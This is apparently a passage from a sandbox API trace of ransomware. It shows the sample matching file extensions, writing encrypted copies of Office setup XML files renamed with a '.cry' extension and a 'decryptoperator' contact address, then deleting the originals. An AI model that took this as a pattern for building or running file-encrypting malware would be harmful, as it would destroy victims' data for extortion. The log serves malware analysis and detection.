(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.554] lstrlenW (lpString=".zip") returned 4 [0040.554] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.554] lstrlenW (lpString=".rar") returned 4 [0040.554] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.554] lstrlenW (lpString=".bz2") returned 4 [0040.554] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.554] lstrlenW (lpString=".7z") returned 3 [0040.554] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.554] lstrlenW (lpString=".dbf") returned 4 [0040.554] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.554] lstrlenW (lpString=".1cd") returned 4 [0040.554] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.554] lstrlenW (lpString=".jpg") returned 4 [0040.554] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.554] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.554] lstrlenW (lpString="SETUP.XML") returned 9 [0040.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.571] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=16683) returned 1 [0040.571] CloseHandle (hObject=0x1bc) returned 1 [0040.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20 [0040.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.571] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.571] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.572] GetLastError () returned 0x0 [0040.572] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x412b, lpOverlapped=0x0) returned 1 [0040.659] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0040.660] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.660] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.661] SetEndOfFile (hFile=0x184) returned 1 [0040.661] CloseHandle (hObject=0x184) returned 1 [0040.661] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.661] SetEndOfFile (hFile=0x1bc) returned 1 [0040.662] CloseHandle (hObject=0x1bc) returned 1 [0040.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.662] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString=".doc") returned 4 [0040.663] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString=".docx") returned 5 [0040.663] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.663] lstrlenW (lpString=".pdf") returned 4 [0040.663] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString=".xls") returned 4 [0040.663] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString=".xlsx") returned 5 [0040.663] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.663] lstrlenW (lpString=".ppt") returned 4 [0040.663] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString=".zip") returned 4 [0040.663] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.663] lstrlenW (lpString=".rar") returned 4 [0040.663] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString=".bz2") returned 4 [0040.663] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString=".7z") returned 3 [0040.663] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString=".dbf") returned 4 [0040.663] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString=".1cd") returned 4 [0040.663] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.663] lstrlenW (lpString=".jpg") returned 4 [0040.663] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString=".doc") returned 4 [0040.664] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString=".docx") returned 5 [0040.664] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.664] lstrlenW (lpString=".pdf") returned 4 [0040.664] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString=".xls") returned 4 [0040.664] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString=".xlsx") returned 5 [0040.664] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.664] lstrlenW (lpString=".ppt") returned 4 [0040.664] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString=".zip") returned 4 [0040.664] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.664] lstrlenW (lpString=".rar") returned 4 [0040.664] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString=".bz2") returned 4 [0040.664] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString=".7z") returned 3 [0040.664] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString=".dbf") returned 4 [0040.664] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString=".1cd") returned 4 [0040.664] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.664] lstrlenW (lpString=".jpg") returned 4 [0040.664] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.664] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.665] lstrlenW (lpString="SETUP.XML") returned 9 [0040.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.665] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1872) returned 1 [0040.665] CloseHandle (hObject=0x1bc) returned 1 [0040.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20 [0040.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.665] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.665] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.665] GetLastError () returned 0x0 [0040.665] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x750, lpOverlapped=0x0) returned 1 [0041.097] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x760, lpOverlapped=0x0) returned 1 [0041.098] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.098] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.098] SetEndOfFile (hFile=0x184) returned 1 [0041.099] CloseHandle (hObject=0x184) returned 1 [0041.099] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.099] SetEndOfFile (hFile=0x1bc) returned 1 [0041.100] CloseHandle (hObject=0x1bc) returned 1 [0041.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.100] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString=".doc") returned 4 [0041.101] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString=".docx") returned 5 [0041.101] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.101] lstrlenW (lpString=".pdf") returned 4 [0041.101] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString=".xls") returned 4 [0041.101] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString=".xlsx") returned 5 [0041.101] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.101] lstrlenW (lpString=".ppt") returned 4 [0041.101] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString=".zip") returned 4 [0041.101] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.101] lstrlenW (lpString=".rar") returned 4 [0041.101] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString=".bz2") returned 4 [0041.101] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString=".7z") returned 3 [0041.101] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString=".dbf") returned 4 [0041.101] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString=".1cd") returned 4 [0041.101] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.101] lstrlenW (lpString=".jpg") returned 4 [0041.102] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.102] lstrlenW (lpString=".doc") returned 4 [0041.102] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString=".docx") returned 5 [0041.102] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.102] lstrlenW (lpString=".pdf") returned 4 [0041.102] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString=".xls") returned 4 [0041.102] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString=".xlsx") returned 5 [0041.102] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.102] lstrlenW (lpString=".ppt") returned 4 [0041.102] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.102] lstrlenW (lpString=".zip") returned 4 [0041.102] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.102] lstrlenW (lpString=".rar") returned 4 [0041.102] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString=".bz2") returned 4 [0041.102] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString=".7z") returned 3 [0041.102] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.102] lstrlenW (lpString=".dbf") returned 4 [0041.102] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.102] lstrlenW (lpString=".1cd") returned 4 [0041.103] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.103] lstrlenW (lpString=".jpg") returned 4 [0041.103] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.103] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.103] lstrlenW (lpString="ProPlusrWW.XML") returned 14 [0041.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.685] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=16852) returned 1 [0041.685] CloseHandle (hObject=0x1b8) returned 1 [0041.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20 [0041.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.685] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.685] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.686] GetLastError () returned 0x0 [0041.686] ReadFile (in: hFile=0x1b8, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0042.067] WriteFile (in: hFile=0x178, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0042.192] ReadFile (in: hFile=0x1b8, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.192] WriteFile (in: hFile=0x178, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0042.192] SetEndOfFile (hFile=0x178) returned 1 [0042.192] CloseHandle (hObject=0x178) returned 1 [0042.193] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.193] SetEndOfFile (hFile=0x1b8) returned 1 [0042.194] CloseHandle (hObject=0x1b8) returned 1 [0042.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.194] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.195] lstrlenW (lpString=".doc") returned 4 [0042.195] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".docx") returned 5 [0042.195] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.195] lstrlenW (lpString=".pdf") returned 4 [0042.195] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".xls") returned 4 [0042.195] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".xlsx") returned 5 [0042.196] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.196] lstrlenW (lpString=".ppt") returned 4 [0042.196] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString=".zip") returned 4 [0042.196] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.196] lstrlenW (lpString=".rar") returned 4 [0042.196] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString=".bz2") returned 4 [0042.196] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString=".7z") returned 3 [0042.196] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString=".dbf") returned 4 [0042.196] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.196] lstrlenW (lpString=".1cd") returned 4 [0042.196] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 